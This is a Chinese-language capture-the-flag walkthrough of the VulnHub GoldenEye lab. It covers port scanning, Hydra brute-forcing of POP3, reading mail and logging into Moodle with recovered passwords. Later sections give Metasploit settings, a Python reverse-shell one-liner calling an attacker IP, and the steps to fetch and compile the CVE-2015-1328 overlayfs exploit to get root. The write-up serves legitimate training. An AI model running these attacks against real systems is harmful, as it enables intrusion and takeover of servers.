[vuluhub]-(GoldenEye)
信息收集
1、首先打開kali查看ip段,這里著重強調,靶場的網卡要和我本kali的網卡一致。
發現是192.168.159.149,這樣這樣我們通過nmap來掃描C端
nmap -sV 192.168.159.0/24192.168.159.1是我本機ip,直接排除,192.168.159.2是我的網關,直接排除,192.168.159.131是我的kali直接排除,確定靶機是192.168.159.154
2、直接對192.168.159.154進行深度挖掘
nmap -sS -sV -T5 -A 192.168.159.154這里可以看到,靶場開發了25端口,80端口,我們打開瀏覽器訪問一下80端口
一串英文,看不懂,直接上谷歌翻譯
其他的都不重要,主要看一下紅框里面的,一個路徑,我們直接拼接到后面,進行訪問
可以看到,這里需要賬號和密碼
這里我們查看一下網頁的源代碼
發現這里有一個js文件,那就點看查看它,又是英文,直接翻譯
通過信息收集發現,這里出現了兩個人名字一個Boris,一個Natalya,還有一串加密的密碼,
InvincibleHack3r
這時候,我們把它放在Bupr來HTML破解,得到密碼:InvincibleHack3r
接下來,我們就可以嘗試登陸,最終賬號密碼:boris/InvincibleHack3r,登陸成功后
上翻譯,看看到底什么意思
那我們就訪問一下http://192.168.159.154/sev-home/
發現新大陸,看一下網頁上的英文是什么意思
這里寫道pop3,在一個非常高的默認端口上,Qualified GoldenEye Network Operator Supervisors: 合格的 GoldenEye 網絡運營商主管,這里我就想到了Natalya和Boris。
這里我們就要用nmap對靶機進行全端口掃描,看看什么情況
namp -p- 192.168.159.154果然出現了兩個比較高的端口,那是不是pop3端口那?用nmap繼續進行測試
nmap -sS -sV -T5 -A -p55006,55007 192.168.159.154這里指定端口進行掃描
這里,我也不知道它到底在那個端口上,那么就挨個嘗試,這里55006,直接顯示錯誤了,那就是55007
訪問http://192.168.159.154:55007
這段信息看出這兩個端口開放了pop3的mail服務的,通過頁面http://192.168.159.154/terminal.js,
在注釋中發現一條內容,指出目標系統正在使用默認密碼。//Boris, make sure you update your default password.
接下來嘗試使用暴力破解,在上一步中找到的用戶名“boris”,通過Hydra暴力破解pop3服務;
echo -e 'natalya\nboris' > wangkun.txt --將這兩個人名字寫到wangkun.txt中
hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九頭蛇對pop3進行爆破
經過漫長的等待,他居然成功了
natalya/bird
boris/secret1!
接下來用通過NC登錄pop3查看郵件信封內容枚舉:
nc 192.168.159.154 55007 ---登錄郵箱
user boris ---登錄用戶
pass secret1! ---登錄密碼
list ---查看郵件數量
retr 1~3 ---查看郵件內容
翻譯大致意思
翻譯大致意思
接下來我們看natalya的郵件
翻譯大致意思
翻譯大致意思
在第二封郵件看到了另外一個用戶名密碼,此服務器域名和網站,還要求我們在本地服務hosts中添加域名信息:
用戶名:xenia
密碼:RCP90rulez!
域:severnaya-station.com
網址:severnaya-station.com/gnocertdir
我們現根據郵件提示添加本地域名:severnaya-station.com
設置本地HOSTS文件
gedit /etc/hosts
192.168.159.154 severnaya-station.com
直接訪問:severnaya-station.com/gnocertdir地址:
剛登陸界面我就看到了moodle,這是一個開源的CMS系統,繼續點一點,發現要登陸,使用郵件獲得的用戶密碼進行登陸。用郵件里面的用戶名和密碼進行登陸一下
登陸成功
在Home->My profile->Messages下面發現一封郵件
發現了新的用戶doak
接著之前的步驟,用九頭蛇對doak用戶進行pop3爆破
將doak寫入wangkun.txt進行爆破
echo ‘doak’ > wangkun.txt
hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3成功爆破賬號密碼:doak/goat,嘗試登陸頁面,但顯示登陸無效,請重試
那我們用nc進行登陸查看郵件
翻譯大致意思如下
它讓登陸dr_doak/4England!賬號繼續挖掘
登陸成功,繼續查看郵件,在Home->My profile ->My private file 目錄下發現了s3crer.txt
將文件下載下來進行查看
訪問這個目錄,而且還發現他的版本是2.2.3
接下來訪問目錄http://severnaya-station.com/dir007key/for-007.jpg,看看是什么
是一張圖片,將圖片下載,
binwalk(路由逆向分析工具)
exiftool(圖蟲)
strings(識別動態庫版本指令)
等查看jpg文件底層內容!
exiftool for-007.jpg
strings for-007.jpg
用以上命令都可以查看到base64編碼隱藏信息:eFdpbnRlcjE5OTV4IQ==
放在burp里面進行解碼:xWinter1995x!
由上面可以知道,這里可能是管理員的密碼,那就在登陸嘗試一下
登陸成功,我們又知道這個CMS有漏洞,接下來就是漏洞利用
Moodle 2.2.3 exp cve --> CVE-2013-3630 漏洞可利用! 29324
第一種方法獲得shell
這里也可以使用kali里面的MSF模塊
msfconsole ---進入MSF框架攻擊界面
search moodle ---查找 moodle類型 攻擊的模塊
use 0 ---調用0 exploit/multi/http/moodle_cmd_exec調用攻擊腳本
set username admin ---設置用戶名:admin
set password xWinter1995x! ---設置密碼:xWinter1995x!
set rhost severnaya-station.com ---設置:rhosts severnaya-station.com
set targeturi /gnocertdir ---設置目錄: /gnocertdir
set payload cmd/unix/reverse ---設置payload:cmd/unix/reverse
set lhost 192.168.159.131 ---設置:lhost 192.168.159.131(需要本地IP)
exploit ----執行命令
利用失敗,當我們執行后發現無法成功,是因為對方需要修改執行PSpellShell,Moodle - Remote Command Execution (Metasploit) - Linux remote Exploit
's_editor_tinymce_spellengine' => 'PSpellShell',
我們在國外漏洞庫搜索的時候,發現他要是用PSpellShell,經過仔細尋找,然后我們在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor
來到此處,修改PSpellShell然后save!
第二種方法獲得shell
Home -> Site administration ->Server->System paths 目錄執行python腳本
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.131",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Home->My profile->Blogs->Add a new entry 在這位置輸入 , 執行命令
成功獲得shell會話
由于權限過低,我們要進行提權
首先看一下內核版本
谷歌搜索:Linux ubuntu 3.13.0-32 exploit
獲得exp版本:37292
CVE(CAN) ID: CVE-2015-1328
overlayfs文件系統是一種疊合式文件系統,實現了在底層文件系統上疊加另一個文件系統。Linux 內核3.18開始已經加入了對overlayfs的支持。Ubuntu Linux內核在更早的版本就已加入該支持。
Ubuntu Linux內核的overlayfs文件系統實現中存在一個權限檢查漏洞,本地普通用戶可以獲取管理員權限。此漏洞影響所有目前官方支持的Ubuntu Linux版本,目前已經發布攻擊代碼,建議受影響用戶盡快進行升級。
此漏洞源于overlayfs文件系統在上層文件系統目錄中創建新文件時沒有正確檢查文件權限。它只檢查了被修改文件的屬主是否有權限在上層文件系統目錄寫入,導致當從底層文件系統目錄中拷貝一個文件到上層文件系統目錄時,文件屬性也隨同拷貝過去。如果Linux內核設置了CONFIG_USER_NS=y和FS_USERNS_MOUNT標志,將允許一個普通用戶在低權限用戶命名空間中mout一個overlayfs文件系統。本地普通用戶可以利用該漏洞在敏感系統目錄中創建新文件或讀取敏感文件內容,從而提升到管理員權限。
kali下面:searchsploit 37292
將腳本copy到root目錄下:
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root
這個靶場在枚舉信息知道:
無法進行GCC編譯,需要改下腳本為cc
gedit 37292.c ---文本打開
第143行將gcc改為cc ---編寫下
然后在本目錄下開啟http服務:python -m SimpleHTTPServer 8081
wget http://192.168.159.131:8081/37292.c
成功下載后執行cc編譯:
cc -o exp 37292.c ---C語言的CC代碼編譯點c文件
chmod +x exp ---編譯成可執行文件,并賦權
./exp ---點杠執行
id ---查看目前權限
cat /root/.flag.txt ---讀取root下的flag信息
至此整個靶場結束
總結
以上是生活随笔為你收集整理的[vuluhub]-(GoldenEye)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 坦克世界服务器系统不更新失败怎么办,wi
- 下一篇: geopandas实现坐标点在对应的地图